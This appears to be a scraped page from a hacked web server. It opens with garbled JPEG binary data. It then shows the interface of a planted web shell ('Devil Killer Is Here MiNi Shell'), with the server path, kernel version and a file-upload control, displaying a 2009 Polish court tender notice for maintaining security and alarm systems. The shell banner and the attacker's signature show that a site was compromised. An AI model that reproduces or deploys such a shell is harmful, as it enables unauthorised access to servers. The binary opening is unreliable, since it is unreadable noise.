JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090120/22735-N-2009.html

<p class="kh_header"><b>Warszawa: Świadczenie usługi stałego nadzoru konserwacyjnego, przeglądów technicznych oraz napraw bieżących i awaryjnych urządzeń i instalacji elektrycznych słaboprądowych w gmachu Sądów przy ul. Terespolskiej 15A w Warszawie.</b><br>
<b>Numer ogłoszenia: 22735 - 2009; data zamieszczenia: 20.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Rejonowy dla Warszawy Pragi-Południe w Warszawie , ul. Terespolska 15A, 03-813 Warszawa, woj. mazowieckie, tel. 022 5091534, faks 022 5091631.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.warszawapraga.so.gov.pl/index?pid=157</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi stałego nadzoru konserwacyjnego, przeglądów technicznych oraz napraw bieżących i awaryjnych urządzeń i instalacji elektrycznych słaboprądowych w gmachu Sądów przy ul. Terespolskiej 15A w Warszawie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)Przedmiotem zamówienia objętym niniejszym postępowaniem jest świadczenie usługi stałego nadzoru konserwacyjnego, przeglądów technicznych oraz napraw bieżących i awaryjnych urządzeń i instalacji elektrycznych słaboprądowych w gmachu Sądów przy ul. Terespolskiej 15A w Warszawie.
2)Wykonawca musi zapewnić stałą obecność na obiekcie co najmniej jednego pracownika, od poniedziałku do piątku ( w dni robocze ), w godz. 8:00 - 16:00 (osiem godzin dziennie), którego zadaniem będzie pełnienie na bieżąco nadzoru nad poprawnością działania urządzeń i instalacji objętych przedmiotem zamówienia oraz wykonywanie czynności zgodnie z umową i szczegółowym zakresem czynności konserwacyjnych. Ponadto w pozostałych godzinach i dniach wykonawca zapewni całodobowe pogotowie techniczne.
3)Szczegółowy zakres czynności konserwacyjnych zawiera załącznik nr 1 do specyfikacji istotnych warunków zmówienia.
4)Przedmiot zamówienia będzie realizowany zgodnie z postanowieniami zawartymi we wzorze umowy, stanowiącym załącznik nr 4 do specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.70.00.00-2, 50.71.10.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  Warunki udziału w postępowaniu.
Zgodnie z art. 22 ust. 1 ustawy o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: 
1)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, tj.
a)wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia. Za spełnienie powyższego warunku zamawiający uzna każdą usługę ( rozpoczętą i zakończoną lub rozpoczętą i wykonywaną przez co najmniej 12 miesięcy ) konserwacji urządzeń i instalacji elektrycznych słaboprądowych o wartości usługi nie niższej niż 90.000,00 zł brutto każda. Zamawiający do porównania przyjmie takie wskazane usługi, dla której określona jest wartość, przedmiot, data wykonywania. Spełnienie warunku porównywalności wymaga załączenia do oferty wykazu usług, zgodnie z załącznikiem nr 6 do siwz, a także załączenia dokumentów ( np. referencje, opinie ) potwierdzających, że usługi zostały wykonane należycie;
b)skierują taką liczbę osób jaka jest wymagana do starannego, należytego i kompleksowego wykonywania przedmiotu zamówienia, odpowiednio do zakresu wskazanego w załączniku nr 1 do specyfikacji istotnych warunków zamówienia i warunków określonych we wzorze umowy, stanowiącym załącznik nr 4 do siwz, przy czym zamawiający wymaga stałej obecności na obiekcie co najmniej jednego pracownika wykonawcy, od poniedziałku do piątku ( w dni robocze ), w godz. 800 - 1600 (osiem godzin dziennie), którego zadaniem będzie pełnienie na bieżąco nadzoru nad poprawnością działania urządzeń i instalacji objętych przedmiotem zamówienia oraz wykonywanie czynności zgodnie z umową i zakresem prac konserwacyjnych; 
c)skierują do wykonywania przedmiotu zamówienia osoby nie karane za przestępstwo ścigane z oskarżenia publicznego, posiadające wymagane uprawnienia do wykonywania konserwacji urządzeń i instalacji słaboprądowych 
( kontrola dostępu, system telewizji przemysłowej, system napadu i włamania, system sygnalizacji pożaru) tj. posiadające świadectwa kwalifikacyjne do wykonywania pracy na stanowisku eksploatacji w zakresie konserwacji urządzeń, instalacji i sieci elektroenergetycznych o napięciu do 1 kV, w tym jedna osoba musi posiadać świadectwo kwalifikacyjne do wykonywania pracy na stanowisku dozoru oraz posiadać licencję pracownika zabezpieczenia technicznego co najmniej pierwszego stopnia. Ponadto wszystkie osoby, które będą wykonywać zamówienie muszą posiadać poświadczenie bezpieczeństwa upoważniające do dostępu do informacji niejawnych stanowiących tajemnice służbową zamawiającego oznaczonych klauzulą co najmniej poufne;
d)w przypadku awarii  zapewnią czas reakcji serwisowej (pogotowia technicznego) w ciągu którego podjęte zostaną działania zmierzające do jej usunięcia, do 60 minut od terminu zgłoszenia telefonicznego przez zamawiającego;
e)udzielą 12 miesięcznej gwarancji na wykonane naprawy, a w przypadku dostarczenia koniecznych do wykonania naprawy części zamiennych udzielą na nie gwarancji równej gwarancji udzielonej przez producenta, nie krótszej jednak niż 12 miesięcy,
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, w tym są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 100.000,00 zł (słownie: sto tysięcy złotych), a w przypadku gdy ubezpieczenie nie obejmuje całego okresu realizacji zamówienia zobowiążą się do jego przedłużenia i złożą wraz z ofertą stosowne oświadczenie.
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia i złożą wraz z ofertą oświadczenie o spełnieniu warunków udziału w postępowaniu - załącznik nr 3 do siwz.

2.   Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu.
1)Zamawiający oceni, czy wykonawca spełnia warunki, o których mowa w ust. 1. na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu i na podstawie złożonych wraz z ofertą dokumentów żądanych przez zamawiającego, o których mowa w ust. 3.
2)Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: wykonawca spełnia albo nie spełnia poszczególne warunki.
3)Jeżeli wykonawca nie złoży oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu lub z treści dołączonych dokumentów nie będzie wynikać, ze zostały spełnione warunki określone w ust. 1, to po nieskutecznym wezwaniu do uzupełnienia zgodnie z art. 26 ust. 3 ustawy, zamawiający wykluczy wykonawcę odpowiednio na podstawie art. 24 ust. 1 i 2 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty wymagane od Wykonawcy:
1)W celu potwierdzenia, ze wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy, zamawiający żąda złożenia wraz z ofertą:
a)koncesji na wykonywanie działalności gospodarczej w zakresie ochrony osób i mienia realizowanych w formie zabezpieczenia technicznego;
b)aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
c)aktualnego zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania oferty;
d)aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania oferty.
2)W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia wykonawca musi złożyć:
a)wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością ( nie mniejszej niż 90.000,00 zł brutto )  usłudze stanowiącej niniejszy  przedmiot zamówienia - realizowanych przez okres co najmniej 12 m-cy, zgodnie z załącznikiem nr 6 do siwz, zawierający co najmniej: przedmiot usługi; wartość usługi; datę wykonania usługi - dzień, miesiąc, rok - tj. daty rozpoczęcia i jej zakończenia, a w przypadku świadczeń okresowych (lub ciągłych) należy podać co najmniej datę rozpoczęcia usługi oraz dodatkową informację, że np. usługa ta jest wykonywana do chwili obecnej; odbiorców usługi, ze wskazaniem co najmniej nazwy, adresu odbiorcy usługi oraz załączenia dokumentów potwierdzających, że usługa została wykonana należycie ( np. referencje, opinie ). Dokument sporządzony w języku obcym, składany jest wraz z tłumaczeniem na język polski, poświadczonym przez osobę uprawniona  do reprezentowania wykonawcy;
b)wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności ( zgodnie z załącznikiem nr 5 do siwz ), do którego należy dołączyć: zgodnie z rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r., w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. Nr 89 poz. 828 ze zm.) - świadectwa kwalifikacyjne do wykonywania pracy na stanowisku eksploatacji w zakresie konserwacji urządzeń, instalacji i sieci elektroenergetycznych o napięciu do 1 kV, w tym dla jednej osoby - świadectwo kwalifikacyjne do wykonywania pracy na stanowisku dozoru wraz z licencją pracownika zabezpieczenia technicznego co najmniej pierwszego stopnia udzieloną na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia ( Dz. U. z 2005 r. Nr 145, poz. 1221 z późn. zm. ). Do wykazu osób należy dołączyć poświadczenia bezpieczeństwa upoważniające do dostępu do informacji niejawnych oznaczonych klauzulą co najmniej poufne, zgodnie ze wzorem zawartym w rozporządzeniu Ministra Spraw Wewnętrznych i Administracji z dnia 23 lutego 1999 r. w sprawie wzoru poświadczenia bezpieczeństwa oraz wzoru odmowy wydania bezpieczeństwa (Dz. U. Nr 18, poz. 165 z późn. zm.). Osoby, które uzyskały poświadczenie bezpieczeństwa po terminie wejścia w życie rozporządzenia Prezesa Rady Ministrów z dnia 25 sierpnia 2005 r. w sprawie wzorów poświadczenia bezpieczeństwa, decyzji o odmowie wydania poświadczenia bezpieczeństwa oraz decyzji o cofnięciu poświadczenia bezpieczeństwa (Dz. U. Nr 171, poz. 1431) przedstawiają poświadczenie wg wzoru określonego tym rozporządzeniem. Poświadczenie bezpieczeństwa musi być ważne w okresie wykonywania umowy.
3)W celu potwierdzenia opisanego przez zamawiającego warunku znajdowania się w przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, wykonawca musi złożyć polisę, a przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 100.000,00 zł (słownie: sto tysięcy złotych). W przypadku gdy ubezpieczenie nie obejmuje całego okresu realizacji zamówienia wykonawca wraz z polisą lub innym dokumentem ubezpieczenia składa oświadczenie, w którym  zobowiązuje się do jego przedłużenia.
4)Wymagane jest złożenie (zgodnie z art. 44 ustawy) wraz z ofertą oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy - w załączeniu druk do wykorzystania ( załącznik nr 3 do siwz ), podpisanego przez osobę/osoby uprawnioną/uprawnione do reprezentowania Wykonawcy. (podpis i pieczątka imienna lub czytelny podpis)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.warszawapraga.so.gov.pl/index.php?pid=157.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Rejonowy dla Warszawy Pragi - Południe w Warszawie, Oddział Gospodarczy, 03 - 813  Warszawa,  ul. Terespolska 15A, pokój nr 742.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2009 godzina 12:00, miejsce: Sąd Rejonowy dla Warszawy Pragi - Południe w Warszawie, Oddział Gospodarczy, 03 - 813  Warszawa,  ul. Terespolska 15A, pokój nr 742.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com